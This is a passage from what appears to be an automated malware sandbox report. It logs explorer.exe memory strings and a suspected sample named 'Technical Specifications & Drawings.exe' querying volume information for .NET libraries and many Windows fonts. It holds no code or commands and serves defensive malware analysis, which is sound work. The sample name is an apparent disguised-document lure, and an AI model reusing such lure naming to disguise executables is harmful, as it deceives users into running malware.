          Source: explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.366589864.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.298681705.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.366589864.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.298681705.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.297954102.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.365954080.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.265765381.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.366589864.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.298681705.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Users\user\Desktop\Technical Specifications & Drawings.exe VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
